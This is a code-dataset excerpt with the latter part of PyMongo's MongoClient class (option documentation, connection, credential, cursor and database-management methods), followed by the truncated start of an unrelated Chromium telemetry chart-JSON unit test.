- `host` (optional): hostname or IP address of a single mongod or
mongos instance to connect to, or a mongodb URI, or a list of
hostnames / mongodb URIs. If `host` is an IPv6 literal
it must be enclosed in '[' and ']' characters following
the RFC2732 URL syntax (e.g. '[::1]' for localhost). Multihomed
and round robin DNS addresses are **not** supported.
- `port` (optional): port number on which to connect
- `document_class` (optional): default class to use for
documents returned from queries on this client
- `tz_aware` (optional): if ``True``,
:class:`~datetime.datetime` instances returned as values
in a document by this :class:`MongoClient` will be timezone
aware (otherwise they will be naive)
- `connect` (optional): if ``True`` (the default), immediately
begin connecting to MongoDB in the background. Otherwise connect
on the first operation.
| **Other optional parameters can be passed as keyword arguments:**
- `maxPoolSize` (optional): The maximum allowable number of
concurrent connections to each connected server. Requests to a
server will block if there are `maxPoolSize` outstanding
connections to the requested server. Defaults to 100. Cannot be 0.
- `minPoolSize` (optional): The minimum required number of concurrent
connections that the pool will maintain to each connected server.
Default is 0.
- `maxIdleTimeMS` (optional): The maximum number of milliseconds that
a connection can remain idle in the pool before being removed and
replaced. Defaults to `None` (no limit).
- `socketTimeoutMS`: (integer or None) Controls how long (in
milliseconds) the driver will wait for a response after sending an
ordinary (non-monitoring) database operation before concluding that
a network error has occurred. Defaults to ``None`` (no timeout).
- `connectTimeoutMS`: (integer or None) Controls how long (in
milliseconds) the driver will wait during server monitoring when
connecting a new socket to a server before concluding the server
is unavailable. Defaults to ``20000`` (20 seconds).
- `serverSelectionTimeoutMS`: (integer) Controls how long (in
milliseconds) the driver will wait to find an available,
appropriate server to carry out a database operation; while it is
waiting, multiple server monitoring operations may be carried out,
each controlled by `connectTimeoutMS`. Defaults to ``30000`` (30
seconds).
- `waitQueueTimeoutMS`: (integer or None) How long (in milliseconds)
a thread will wait for a socket from the pool if the pool has no
free sockets. Defaults to ``None`` (no timeout).
- `waitQueueMultiple`: (integer or None) Multiplied by maxPoolSize
to give the number of threads allowed to wait for a socket at one
time. Defaults to ``None`` (no limit).
- `socketKeepAlive`: (boolean) Whether to send periodic keep-alive
packets on connected sockets. Defaults to ``False`` (do not send
keep-alive packets).
- `heartbeatFrequencyMS`: (optional) The number of milliseconds
between periodic server checks, or None to accept the default
frequency of 10 seconds.
- `event_listeners`: a list or tuple of event listeners. See
:mod:`~pymongo.monitoring` for details.
| **Write Concern options:**
| (Only set if passed. No default values.)
- `w`: (integer or string) If this is a replica set, write operations
will block until they have been replicated to the specified number
or tagged set of servers. `w=<int>` always includes the replica set
primary (e.g. w=3 means write to the primary and wait until
replicated to **two** secondaries). Passing w=0 **disables write
acknowledgement** and all other write concern options.
- `wtimeout`: (integer) Used in conjunction with `w`. Specify a value
in milliseconds to control how long to wait for write propagation
to complete. If replication does not complete in the given
timeframe, a timeout exception is raised.
- `j`: If ``True`` block until write operations have been committed
to the journal. Cannot be used in combination with `fsync`. Prior
to MongoDB 2.6 this option was ignored if the server was running
without journaling. Starting with MongoDB 2.6 write operations will
fail with an exception if this option is used when the server is
running without journaling.
- `fsync`: If ``True`` and the server is running without journaling,
blocks until the server has synced all data files to disk. If the
server is running with journaling, this acts the same as the `j`
option, blocking until write operations have been committed to the
journal. Cannot be used in combination with `j`.
| **Replica set keyword arguments for connecting with a replica set
- either directly or via a mongos:**
- `replicaSet`: (string or None) The name of the replica set to
connect to. The driver will verify that all servers it connects to
match this name. Implies that the hosts specified are a seed list
and the driver should attempt to find all members of the set.
Defaults to ``None``.
- `read_preference`: The read preference for this client.
See :class:`~pymongo.read_preferences.ReadPreference` for all
available read preference options. Defaults to ``PRIMARY``.
| **SSL configuration:**
- `ssl`: If ``True``, create the connection to the server using SSL.
Defaults to ``False``.
- `ssl_certfile`: The certificate file used to identify the local
connection against mongod. Implies ``ssl=True``. Defaults to
``None``.
- `ssl_keyfile`: The private keyfile used to identify the local
connection against mongod. If included with the ``certfile`` then
only the ``ssl_certfile`` is needed. Implies ``ssl=True``.
Defaults to ``None``.
- `ssl_pem_passphrase`: The password or passphrase for decrypting
the private key in ``ssl_certfile`` or ``ssl_keyfile``. Only
necessary if the private key is encrypted. Only supported by python
2.7.9+ (pypy 2.5.1+) and 3.3+. Defaults to ``None``.
- `ssl_cert_reqs`: Specifies whether a certificate is required from
the other side of the connection, and whether it will be validated
if provided. It must be one of the three values ``ssl.CERT_NONE``
(certificates ignored), ``ssl.CERT_REQUIRED`` (certificates
required and validated), or ``ssl.CERT_OPTIONAL`` (the same as
CERT_REQUIRED, unless the server was configured to use anonymous
ciphers). If the value of this parameter is not ``ssl.CERT_NONE``
and a value is not provided for ``ssl_ca_certs`` PyMongo will
attempt to load system provided CA certificates. If the python
version in use does not support loading system CA certificates
then the ``ssl_ca_certs`` parameter must point to a file of CA
certificates. Implies ``ssl=True``. Defaults to
``ssl.CERT_REQUIRED`` if not provided and ``ssl=True``.
- `ssl_ca_certs`: The ca_certs file contains a set of concatenated
"certification authority" certificates, which are used to validate
certificates passed from the other end of the connection.
Implies ``ssl=True``. Defaults to ``None``.
- `ssl_crlfile`: The path to a PEM or DER formatted certificate
revocation list. Only supported by python 2.7.9+ (pypy 2.5.1+)
and 3.4+. Defaults to ``None``.
- `ssl_match_hostname`: If ``True`` (the default), and
`ssl_cert_reqs` is not ``ssl.CERT_NONE``, enables hostname
verification using the :func:`~ssl.match_hostname` function from
python's :mod:`~ssl` module. Think very carefully before setting
this to ``False`` as that could make your application vulnerable to
man-in-the-middle attacks.
| **Read Concern options:**
| (If not set explicitly, this will use the server default)
- `readConcernLevel`: (string) The read concern level specifies the
level of isolation for read operations. For example, a read
operation using a read concern level of ``majority`` will only
return data that has been written to a majority of nodes. If the
level is left unspecified, the server default will be used.
.. mongodoc:: connections
.. versionchanged:: 3.0
:class:`~pymongo.mongo_client.MongoClient` is now the one and only
client class for a standalone server, mongos, or replica set.
It includes the functionality that had been split into
:class:`~pymongo.mongo_client.MongoReplicaSetClient`: it can connect
to a replica set, discover all its members, and monitor the set for
stepdowns, elections, and reconfigs.
The :class:`~pymongo.mongo_client.MongoClient` constructor no
longer blocks while connecting to the server or servers, and it no
longer raises :class:`~pymongo.errors.ConnectionFailure` if they
are unavailable, nor :class:`~pymongo.errors.ConfigurationError`
if the user's credentials are wrong. Instead, the constructor
returns immediately and launches the connection process on
background threads.
Therefore the ``alive`` method is removed since it no longer
provides meaningful information; even if the client is disconnected,
it may discover a server in time to fulfill the next operation.
In PyMongo 2.x, :class:`~pymongo.MongoClient` accepted a list of
standalone MongoDB servers and used the first it could connect to::
MongoClient(['host1.com:27017', 'host2.com:27017'])
A list of multiple standalones is no longer supported; if multiple
servers are listed they must be members of the same replica set, or
mongoses in the same sharded cluster.
The behavior for a list of mongoses is changed from "high
availability" to "load balancing". Before, the client connected to
the lowest-latency mongos in the list, and used it until a network
error prompted it to re-evaluate all mongoses' latencies and
reconnect to one of them. In PyMongo 3, the client monitors its
network latency to all the mongoses continuously, and distributes
operations evenly among those with the lowest latency. See
:ref:`mongos-load-balancing` for more information.
The ``connect`` option is added.
The ``start_request``, ``in_request``, and ``end_request`` methods
are removed, as well as the ``auto_start_request`` option.
The ``copy_database`` method is removed, see the
:doc:`copy_database examples </examples/copydb>` for alternatives.
The :meth:`MongoClient.disconnect` method is removed; it was a
synonym for :meth:`~pymongo.MongoClient.close`.
:class:`~pymongo.mongo_client.MongoClient` no longer returns an
instance of :class:`~pymongo.database.Database` for attribute names
with leading underscores. You must use dict-style lookups instead::
client['__my_database__']
Not::
client.__my_database__
"""
if host is None:
host = self.HOST
if isinstance(host, string_type):
host = [host]
if port is None:
port = self.PORT
if not isinstance(port, int):
raise TypeError("port must be an instance of int")
seeds = set()
username = None
password = None
dbase = None
opts = {}
for entity in host:
if "://" in entity:
if entity.startswith("mongodb://"):
res = uri_parser.parse_uri(entity, port, warn=True)
seeds.update(res["nodelist"])
username = res["username"] or username
password = res["password"] or password
dbase = res["database"] or dbase
opts = res["options"]
else:
idx = entity.find("://")
raise InvalidURI("Invalid URI scheme: "
"%s" % (entity[:idx],))
else:
seeds.update(uri_parser.split_hosts(entity, port))
if not seeds:
raise ConfigurationError("need to specify at least one host")
# _pool_class, _monitor_class, and _condition_class are for deep
# customization of PyMongo, e.g. Motor.
pool_class = kwargs.pop('_pool_class', None)
monitor_class = kwargs.pop('_monitor_class', None)
condition_class = kwargs.pop('_condition_class', None)
keyword_opts = kwargs
keyword_opts['document_class'] = document_class
keyword_opts['tz_aware'] = tz_aware
keyword_opts['connect'] = connect
# Validate all keyword options.
keyword_opts = dict(common.validate(k, v)
for k, v in keyword_opts.items())
opts.update(keyword_opts)
self.__options = options = ClientOptions(
username, password, dbase, opts)
self.__default_database_name = dbase
self.__lock = threading.Lock()
self.__cursor_manager = None
self.__kill_cursors_queue = []
self._event_listeners = options.pool_options.event_listeners
# Cache of existing indexes used by ensure_index ops.
self.__index_cache = {}
self.__index_cache_lock = threading.Lock()
super(MongoClient, self).__init__(options.codec_options,
options.read_preference,
options.write_concern,
options.read_concern)
self.__all_credentials = {}
creds = options.credentials
if creds:
self._cache_credentials(creds.source, creds)
self._topology_settings = TopologySettings(
seeds=seeds,
replica_set_name=options.replica_set_name,
pool_class=pool_class,
pool_options=options.pool_options,
monitor_class=monitor_class,
condition_class=condition_class,
local_threshold_ms=options.local_threshold_ms,
server_selection_timeout=options.server_selection_timeout,
heartbeat_frequency=options.heartbeat_frequency)
self._topology = Topology(self._topology_settings)
if connect:
self._topology.open()
def target():
client = self_ref()
if client is None:
return False # Stop the executor.
MongoClient._process_periodic_tasks(client)
return True
executor = periodic_executor.PeriodicExecutor(
interval=common.KILL_CURSOR_FREQUENCY,
min_interval=0.5,
target=target,
name="pymongo_kill_cursors_thread")
# We strongly reference the executor and it weakly references us via
# this closure. When the client is freed, stop the executor soon.
self_ref = weakref.ref(self, executor.close)
self._kill_cursors_executor = executor
executor.open()
def _cache_credentials(self, source, credentials, connect=False):
"""Save a set of authentication credentials.
The credentials are used to login a socket whenever one is created.
If `connect` is True, verify the credentials on the server first.
"""
# Don't let other threads affect this call's data.
all_credentials = self.__all_credentials.copy()
if source in all_credentials:
# Nothing to do if we already have these credentials.
if credentials == all_credentials[source]:
return
raise OperationFailure('Another user is already authenticated '
'to this database. You must logout first.')
if connect:
server = self._get_topology().select_server(
writable_preferred_server_selector)
# get_socket() logs out of the database if logged in with old
# credentials, and logs in with new ones.
with server.get_socket(all_credentials) as sock_info:
sock_info.authenticate(credentials)
# If several threads run _cache_credentials at once, last one wins.
self.__all_credentials[source] = credentials
def _purge_credentials(self, source):
"""Purge credentials from the authentication cache."""
self.__all_credentials.pop(source, None)
def _cached(self, dbname, coll, index):
"""Test if `index` is cached."""
cache = self.__index_cache
now = datetime.datetime.utcnow()
with self.__index_cache_lock:
return (dbname in cache and
coll in cache[dbname] and
index in cache[dbname][coll] and
now < cache[dbname][coll][index])
def _cache_index(self, dbname, collection, index, cache_for):
"""Add an index to the index cache for ensure_index operations."""
now = datetime.datetime.utcnow()
expire = datetime.timedelta(seconds=cache_for) + now
with self.__index_cache_lock:
if database not in self.__index_cache:
self.__index_cache[dbname] = {}
self.__index_cache[dbname][collection] = {}
self.__index_cache[dbname][collection][index] = expire
elif collection not in self.__index_cache[dbname]:
self.__index_cache[dbname][collection] = {}
self.__index_cache[dbname][collection][index] = expire
else:
self.__index_cache[dbname][collection][index] = expire
def _purge_index(self, database_name,
collection_name=None, index_name=None):
"""Purge an index from the index cache.
If `index_name` is None purge an entire collection.
If `collection_name` is None purge an entire database.
"""
with self.__index_cache_lock:
if not database_name in self.__index_cache:
return
if collection_name is None:
del self.__index_cache[database_name]
return
if not collection_name in self.__index_cache[database_name]:
return
if index_name is None:
del self.__index_cache[database_name][collection_name]
return
if index_name in self.__index_cache[database_name][collection_name]:
del self.__index_cache[database_name][collection_name][index_name]
def _server_property(self, attr_name):
"""An attribute of the current server's description.
If the client is not connected, this will block until a connection is
established or raise ServerSelectionTimeoutError if no server is
available.
Not threadsafe if used multiple times in a single method, since
the server may change. In such cases, store a local reference to a
ServerDescription first, then use its properties.
"""
server = self._topology.select_server(
writable_server_selector)
return getattr(server.description, attr_name)
@property
def event_listeners(self):
"""The event listeners registered for this client.
See :mod:`~pymongo.monitoring` for details.
"""
return self._event_listeners.event_listeners
@property
def address(self):
"""(host, port) of the current standalone, primary, or mongos, or None.
Accessing :attr:`address` raises :exc:`~.errors.InvalidOperation` if
the client is load-balancing among mongoses, since there is no single
address. Use :attr:`nodes` instead.
If the client is not connected, this will block until a connection is
established or raise ServerSelectionTimeoutError if no server is
available.
.. versionadded:: 3.0
"""
topology_type = self._topology._description.topology_type
if topology_type == TOPOLOGY_TYPE.Sharded:
raise InvalidOperation(
'Cannot use "address" property when load balancing among'
' mongoses, use "nodes" instead.')
if topology_type not in (TOPOLOGY_TYPE.ReplicaSetWithPrimary,
TOPOLOGY_TYPE.Single):
return None
return self._server_property('address')
@property
def primary(self):
"""The (host, port) of the current primary of the replica set.
Returns ``None`` if this client is not connected to a replica set,
there is no primary, or this client was created without the
`replicaSet` option.
.. versionadded:: 3.0
MongoClient gained this property in version 3.0 when
MongoReplicaSetClient's functionality was merged in.
"""
return self._topology.get_primary()
@property
def secondaries(self):
"""The secondary members known to this client.
A sequence of (host, port) pairs. Empty if this client is not
connected to a replica set, there are no visible secondaries, or this
client was created without the `replicaSet` option.
.. versionadded:: 3.0
MongoClient gained this property in version 3.0 when
MongoReplicaSetClient's functionality was merged in.
"""
return self._topology.get_secondaries()
@property
def arbiters(self):
"""Arbiters in the replica set.
A sequence of (host, port) pairs. Empty if this client is not
connected to a replica set, there are no arbiters, or this client was
created without the `replicaSet` option.
"""
return self._topology.get_arbiters()
@property
def is_primary(self):
"""If this client is connected to a server that can accept writes.
True if the current server is a standalone, mongos, or the primary of
a replica set. If the client is not connected, this will block until a
connection is established or raise ServerSelectionTimeoutError if no
server is available.
"""
return self._server_property('is_writable')
@property
def is_mongos(self):
"""If this client is connected to mongos. If the client is not
connected, this will block until a connection is established or raise
ServerSelectionTimeoutError if no server is available..
"""
return self._server_property('server_type') == SERVER_TYPE.Mongos
@property
def max_pool_size(self):
"""The maximum allowable number of concurrent connections to each
connected server. Requests to a server will block if there are
`maxPoolSize` outstanding connections to the requested server.
Defaults to 100. Cannot be 0.
When a server's pool has reached `max_pool_size`, operations for that
server block waiting for a socket to be returned to the pool. If
``waitQueueTimeoutMS`` is set, a blocked operation will raise
:exc:`~pymongo.errors.ConnectionFailure` after a timeout.
By default ``waitQueueTimeoutMS`` is not set.
"""
return self.__options.pool_options.max_pool_size
@property
def min_pool_size(self):
"""The minimum required number of concurrent connections that the pool
will maintain to each connected server. Default is 0.
"""
return self.__options.pool_options.min_pool_size
@property
def max_idle_time_ms(self):
"""The maximum number of milliseconds that a connection can remain
idle in the pool before being removed and replaced. Defaults to
`None` (no limit).
"""
return self.__options.pool_options.max_idle_time_ms
@property
def nodes(self):
"""Set of all currently connected servers.
.. warning:: When connected to a replica set the value of :attr:`nodes`
can change over time as :class:`MongoClient`'s view of the replica
set changes. :attr:`nodes` can also be an empty set when
:class:`MongoClient` is first instantiated and hasn't yet connected
to any servers, or a network partition causes it to lose connection
to all servers.
"""
description = self._topology.description
return frozenset(s.address for s in description.known_servers)
@property
def max_bson_size(self):
"""The largest BSON object the connected server accepts in bytes.
If the client is not connected, this will block until a connection is
established or raise ServerSelectionTimeoutError if no server is
available.
"""
return self._server_property('max_bson_size')
@property
def max_message_size(self):
"""The largest message the connected server accepts in bytes.
If the client is not connected, this will block until a connection is
established or raise ServerSelectionTimeoutError if no server is
available.
"""
return self._server_property('max_message_size')
@property
def max_write_batch_size(self):
"""The maxWriteBatchSize reported by the server.
If the client is not connected, this will block until a connection is
established or raise ServerSelectionTimeoutError if no server is
available.
Returns a default value when connected to server versions prior to
MongoDB 2.6.
"""
return self._server_property('max_write_batch_size')
@property
def local_threshold_ms(self):
"""The local threshold for this instance."""
return self.__options.local_threshold_ms
@property
def server_selection_timeout(self):
"""The server selection timeout for this instance in seconds."""
return self.__options.server_selection_timeout
def _is_writable(self):
"""Attempt to connect to a writable server, or return False.
"""
topology = self._get_topology() # Starts monitors if necessary.
try:
svr = topology.select_server(writable_server_selector)
# When directly connected to a secondary, arbiter, etc.,
# select_server returns it, whatever the selector. Check
# again if the server is writable.
return svr.description.is_writable
except ConnectionFailure:
return False
def close(self):
"""Disconnect from MongoDB.
Close all sockets in the connection pools and stop the monitor threads.
If this instance is used again it will be automatically re-opened and
the threads restarted.
"""
self._topology.close()
def set_cursor_manager(self, manager_class):
"""DEPRECATED - Set this client's cursor manager.
Raises :class:`TypeError` if `manager_class` is not a subclass of
:class:`~pymongo.cursor_manager.CursorManager`. A cursor manager
handles closing cursors. Different managers can implement different
policies in terms of when to actually kill a cursor that has
been closed.
:Parameters:
- `manager_class`: cursor manager to use
.. versionchanged:: 3.3
Deprecated, for real this time.
.. versionchanged:: 3.0
Undeprecated.
"""
warnings.warn(
"set_cursor_manager is Deprecated",
DeprecationWarning,
stacklevel=2)
manager = manager_class(self)
if not isinstance(manager, CursorManager):
raise TypeError("manager_class must be a subclass of "
"CursorManager")
self.__cursor_manager = manager
def _get_topology(self):
"""Get the internal :class:`~pymongo.topology.Topology` object.
If this client was created with "connect=False", calling _get_topology
launches the connection process in the background.
"""
self._topology.open()
return self._topology
@contextlib.contextmanager
def _get_socket(self, selector):
server = self._get_topology().select_server(selector)
try:
with server.get_socket(self.__all_credentials) as sock_info:
yield sock_info
except NetworkTimeout:
# The socket has been closed. Don't reset the server.
# Server Discovery And Monitoring Spec: "When an application
# operation fails because of any network error besides a socket
# timeout...."
raise
except NotMasterError:
# "When the client sees a "not master" error it MUST replace the
# server's description with type Unknown. It MUST request an
# immediate check of the server."
self._reset_server_and_request_check(server.description.address)
raise
except ConnectionFailure:
# "Client MUST replace the server's description with type Unknown
# ... MUST NOT request an immediate check of the server."
self.__reset_server(server.description.address)
raise
def _socket_for_writes(self):
return self._get_socket(writable_server_selector)
@contextlib.contextmanager
def _socket_for_reads(self, read_preference):
preference = read_preference or ReadPreference.PRIMARY
# Get a socket for a server matching the read preference, and yield
# sock_info, slave_ok. Server Selection Spec: "slaveOK must be sent to
# mongods with topology type Single. If the server type is Mongos,
# follow the rules for passing read preference to mongos, even for
# topology type Single."
# Thread safe: if the type is single it cannot change.
topology = self._get_topology()
single = topology.description.topology_type == TOPOLOGY_TYPE.Single
with self._get_socket(read_preference) as sock_info:
slave_ok = (single and not sock_info.is_mongos) or (
preference != ReadPreference.PRIMARY)
yield sock_info, slave_ok
def _send_message_with_response(self, operation, read_preference=None,
exhaust=False, address=None):
"""Send a message to MongoDB and return a Response.
:Parameters:
- `operation`: a _Query or _GetMore object.
- `read_preference` (optional): A ReadPreference.
- `exhaust` (optional): If True, the socket used stays checked out.
It is returned along with its Pool in the Response.
- `address` (optional): Optional address when sending a message
to a specific server, used for getMore.
"""
with self.__lock:
# If needed, restart kill-cursors thread after a fork.
self._kill_cursors_executor.open()
topology = self._get_topology()
if address:
server = topology.select_server_by_address(address)
if not server:
raise AutoReconnect('server %s:%d no longer available'
% address)
else:
selector = read_preference or writable_server_selector
server = topology.select_server(selector)
# A _Query's slaveOk bit is already set for queries with non-primary
# read preference. If this is a direct connection to a mongod, override
# and *always* set the slaveOk bit. See bullet point 2 in
# server-selection.rst#topology-type-single.
set_slave_ok = (
topology.description.topology_type == TOPOLOGY_TYPE.Single
and server.description.server_type != SERVER_TYPE.Mongos)
return self._reset_on_error(
server,
server.send_message_with_response,
operation,
set_slave_ok,
self.__all_credentials,
self._event_listeners,
exhaust)
def _reset_on_error(self, server, func, *args, **kwargs):
"""Execute an operation. Reset the server on network error.
Returns fn()'s return value on success. On error, clears the server's
pool and marks the server Unknown.
Re-raises any exception thrown by fn().
"""
try:
return func(*args, **kwargs)
except NetworkTimeout:
# The socket has been closed. Don't reset the server.
raise
except ConnectionFailure:
self.__reset_server(server.description.address)
raise
def __reset_server(self, address):
"""Clear our connection pool for a server and mark it Unknown."""
self._topology.reset_server(address)
def _reset_server_and_request_check(self, address):
"""Clear our pool for a server, mark it Unknown, and check it soon."""
self._topology.reset_server_and_request_check(address)
def __eq__(self, other):
if isinstance(other, self.__class__):
return self.address == other.address
return NotImplemented
def __ne__(self, other):
return not self == other
def _repr_helper(self):
def option_repr(option, value):
"""Fix options whose __repr__ isn't usable in a constructor."""
if option == 'document_class':
if value is dict:
return 'document_class=dict'
else:
return 'document_class=%s.%s' % (value.__module__,
value.__name__)
if option in common.TIMEOUT_VALIDATORS and value is not None:
return "%s=%s" % (option, int(value * 1000))
return '%s=%r' % (option, value)
# Host first...
options = ['host=%r' % [
'%s:%d' % (host, port)
for host, port in self._topology_settings.seeds]]
# ... then everything in self._constructor_args...
options.extend(
option_repr(key, self.__options._options[key])
for key in self._constructor_args)
# ... then everything else.
options.extend(
option_repr(key, self.__options._options[key])
for key in self.__options._options
if key not in set(self._constructor_args))
return ', '.join(options)
def __repr__(self):
return ("MongoClient(%s)" % (self._repr_helper(),))
def __getattr__(self, name):
"""Get a database by name.
Raises :class:`~pymongo.errors.InvalidName` if an invalid
database name is used.
:Parameters:
- `name`: the name of the database to get
"""
if name.startswith('_'):
raise AttributeError(
"MongoClient has no attribute %r. To access the %s"
" database, use client[%r]." % (name, name, name))
return self.__getitem__(name)
def __getitem__(self, name):
"""Get a database by name.
Raises :class:`~pymongo.errors.InvalidName` if an invalid
database name is used.
:Parameters:
- `name`: the name of the database to get
"""
return database.Database(self, name)
def close_cursor(self, cursor_id, address=None):
"""Send a kill cursors message soon with the given id.
Raises :class:`TypeError` if `cursor_id` is not an instance of
``(int, long)``. What closing the cursor actually means
depends on this client's cursor manager.
This method may be called from a :class:`~pymongo.cursor.Cursor`
destructor during garbage collection, so it isn't safe to take a
lock or do network I/O. Instead, we schedule the cursor to be closed
soon on a background thread.
:Parameters:
- `cursor_id`: id of cursor to close
- `address` (optional): (host, port) pair of the cursor's server.
If it is not provided, the client attempts to close the cursor on
the primary or standalone, or a mongos server.
.. versionchanged:: 3.0
Added ``address`` parameter.
"""
if not isinstance(cursor_id, integer_types):
raise TypeError("cursor_id must be an instance of (int, long)")
if self.__cursor_manager is not None:
self.__cursor_manager.close(cursor_id, address)
else:
self.__kill_cursors_queue.append((address, [cursor_id]))
def kill_cursors(self, cursor_ids, address=None):
"""DEPRECATED - Send a kill cursors message soon with the given ids.
Raises :class:`TypeError` if `cursor_ids` is not an instance of
``list``.
:Parameters:
- `cursor_ids`: list of cursor ids to kill
- `address` (optional): (host, port) pair of the cursor's server.
If it is not provided, the client attempts to close the cursor on
the primary or standalone, or a mongos server.
.. versionchanged:: 3.3
Deprecated.
.. versionchanged:: 3.0
Now accepts an `address` argument. Schedules the cursors to be
closed on a background thread instead of sending the message
immediately.
"""
warnings.warn(
"kill_cursors is deprecated.",
DeprecationWarning,
stacklevel=2)
if not isinstance(cursor_ids, list):
raise TypeError("cursor_ids must be a list")
# "Atomic", needs no lock.
self.__kill_cursors_queue.append((address, cursor_ids))
# This method is run periodically by a background thread.
def _process_periodic_tasks(self):
"""Process any pending kill cursors requests and
maintain connection pool parameters."""
address_to_cursor_ids = defaultdict(list)
# Other threads or the GC may append to the queue concurrently.
while True:
try:
address, cursor_ids = self.__kill_cursors_queue.pop()
except IndexError:
break
address_to_cursor_ids[address].extend(cursor_ids)
# Don't re-open topology if it's closed and there's no pending cursors.
if address_to_cursor_ids:
listeners = self._event_listeners
publish = listeners.enabled_for_commands
topology = self._get_topology()
for address, cursor_ids in address_to_cursor_ids.items():
try:
if address:
# address could be a tuple or _CursorAddress, but
# select_server_by_address needs (host, port).
server = topology.select_server_by_address(
tuple(address))
else:
# Application called close_cursor() with no address.
server = topology.select_server(
writable_server_selector)
try:
namespace = address.namespace
db, coll = namespace.split('.', 1)
except AttributeError:
namespace = None
db = coll = "OP_KILL_CURSORS"
spec = SON([('killCursors', coll),
('cursors', cursor_ids)])
with server.get_socket(self.__all_credentials) as sock_info:
if (sock_info.max_wire_version >= 4 and
namespace is not None):
sock_info.command(db, spec)
else:
if publish:
start = datetime.datetime.now()
request_id, msg = message.kill_cursors(cursor_ids)
if publish:
duration = datetime.datetime.now() - start
listeners.publish_command_start(
spec, db, request_id, address)
start = datetime.datetime.now()
try:
sock_info.send_message(msg, 0)
except Exception as exc:
if publish:
dur = ((datetime.datetime.now() - start)
+ duration)
listeners.publish_command_failure(
dur, message._convert_exception(exc),
'killCursors', request_id, address)
raise
if publish:
duration = ((datetime.datetime.now() - start)
+ duration)
# OP_KILL_CURSORS returns no reply, fake one.
reply = {'cursorsUnknown': cursor_ids, 'ok': 1}
listeners.publish_command_success(
duration, reply, 'killCursors', request_id,
address)
except Exception:
helpers._handle_exception()
try:
self._topology.update_pool()
except Exception:
helpers._handle_exception()
def server_info(self):
"""Get information about the MongoDB server we're connected to."""
return self.admin.command("buildinfo",
read_preference=ReadPreference.PRIMARY)
def database_names(self):
"""Get a list of the names of all databases on the connected server."""
return [db["name"] for db in
self._database_default_options('admin').command(
"listDatabases")["databases"]]
def drop_database(self, name_or_database):
"""Drop a database.
Raises :class:`TypeError` if `name_or_database` is not an instance of
:class:`basestring` (:class:`str` in python 3) or
:class:`~pymongo.database.Database`.
:Parameters:
- `name_or_database`: the name of a database to drop, or a
:class:`~pymongo.database.Database` instance representing the
database to drop
"""
name = name_or_database
if isinstance(name, database.Database):
name = name.name
if not isinstance(name, string_type):
raise TypeError("name_or_database must be an instance "
"of %s or a Database" % (string_type.__name__,))
self._purge_index(name)
self[name].command("dropDatabase",
read_preference=ReadPreference.PRIMARY)
def get_default_database(self):
"""Get the database named in the MongoDB connection URI.
>>> uri = 'mongodb://host/my_database'
>>> client = MongoClient(uri)
>>> db = client.get_default_database()
>>> assert db.name == 'my_database'
Useful in scripts where you want to choose which database to use
based only on the URI in a configuration file.
"""
if self.__default_database_name is None:
raise ConfigurationError('No default database defined')
return self[self.__default_database_name]
def get_database(self, name, codec_options=None, read_preference=None,
write_concern=None, read_concern=None):
"""Get a :class:`~pymongo.database.Database` with the given name and
options.
Useful for creating a :class:`~pymongo.database.Database` with
different codec options, read preference, and/or write concern from
this :class:`MongoClient`.
>>> client.read_preference
Primary()
>>> db1 = client.test
>>> db1.read_preference
Primary()
>>> from pymongo import ReadPreference
>>> db2 = client.get_database(
... 'test', read_preference=ReadPreference.SECONDARY)
>>> db2.read_preference
Secondary(tag_sets=None)
:Parameters:
- `name`: The name of the database - a string.
- `codec_options` (optional): An instance of
:class:`~bson.codec_options.CodecOptions`. If ``None`` (the
default) the :attr:`codec_options` of this :class:`MongoClient` is
used.
- `read_preference` (optional): The read preference to use. If
``None`` (the default) the :attr:`read_preference` of this
:class:`MongoClient` is used. See :mod:`~pymongo.read_preferences`
for options.
- `write_concern` (optional): An instance of
:class:`~pymongo.write_concern.WriteConcern`. If ``None`` (the
default) the :attr:`write_concern` of this :class:`MongoClient` is
used.
- `read_concern` (optional): An instance of
:class:`~pymongo.read_concern.ReadConcern`. If ``None`` (the
default) the :attr:`read_concern` of this :class:`MongoClient` is
used.
"""
return database.Database(
self, name, codec_options, read_preference,
write_concern, read_concern)
def _database_default_options(self, name):
"""Get a Database instance with the default settings."""
return self.get_database(
name, codec_options=DEFAULT_CODEC_OPTIONS,
read_preference=ReadPreference.PRIMARY,
write_concern=WriteConcern())
@property
def is_locked(self):
"""Is this server locked? While locked, all write operations
are blocked, although read operations may still be allowed.
Use :meth:`unlock` to unlock.
"""
ops = self._database_default_options('admin').current_op()
return bool(ops.get('fsyncLock', 0))
def fsync(self, **kwargs):
"""Flush all pending writes to datafiles.
:Parameters:
Optional parameters can be passed as keyword arguments:
- `lock`: If True lock the server to disallow writes.
- `async`: If True don't block while synchronizing.
.. warning:: `async` and `lock` can not be used together.
.. warning:: MongoDB does not support the `async` option
on Windows and will raise an exception on that
platform.
"""
self.admin.command("fsync",
read_preference=ReadPreference.PRIMARY, **kwargs)
def unlock(self):
"""Unlock a previously locked server.
"""
cmd = {"fsyncUnlock": 1}
with self._socket_for_writes() as sock_info:
if sock_info.max_wire_version >= 4:
try:
sock_info.command("admin", cmd)
except OperationFailure as exc:
# Ignore "DB not locked" to replicate old behavior
if exc.code != 125:
raise
else:
helpers._first_batch(sock_info, "admin", "$cmd.sys.unlock",
{}, -1, True, self.codec_options,
ReadPreference.PRIMARY, cmd, self._event_listeners)
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.close()
def __iter__(self):
return self
def __next__(self):
raise TypeError("'MongoClient' object is not iterable")
next = __next__
| gpl-3.0 |
Plain-Andy-legacy/android_external_chromium_org | tools/telemetry/telemetry/results/chart_json_output_formatter_unittest.py | 27 | 5330 | # Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import json
import os
import StringIO
import unittest
from telemetry import benchmark
from telemetry.results import chart_json_output_formatter
from telemetry.results import page_test_results
from telemetry.page import page_set
from telemetry.value import scalar
from telemetry.value import list_of_scalar_values
def _MakePageSet():
ps = page_set.PageSet(file_path=os.path.dirname(__file__))
ps.AddPageWithDefaultRunNavigate('http://www.foo.com/')
ps.AddPageWithDefaultRunNavigate('http://www.bar.com/')
return ps
class ChartJsonTest(unittest.TestCase):
def setUp(self):
self._output = StringIO.StringIO()
self._page_set = _MakePageSet()
self._benchmark_metadata = benchmark.BenchmarkMetadata('benchmark_name')
self._formatter = chart_json_output_formatter.ChartJsonOutputFormatter(
self._output, self._benchmark_metadata)
def testOutputAndParse(self):
results = page_test_results.PageTestResults()
self._output.truncate(0)
results.WillRunPage(self._page_set[0])
v0 = scalar.ScalarValue(results.current_page, 'foo', 'seconds', 3)
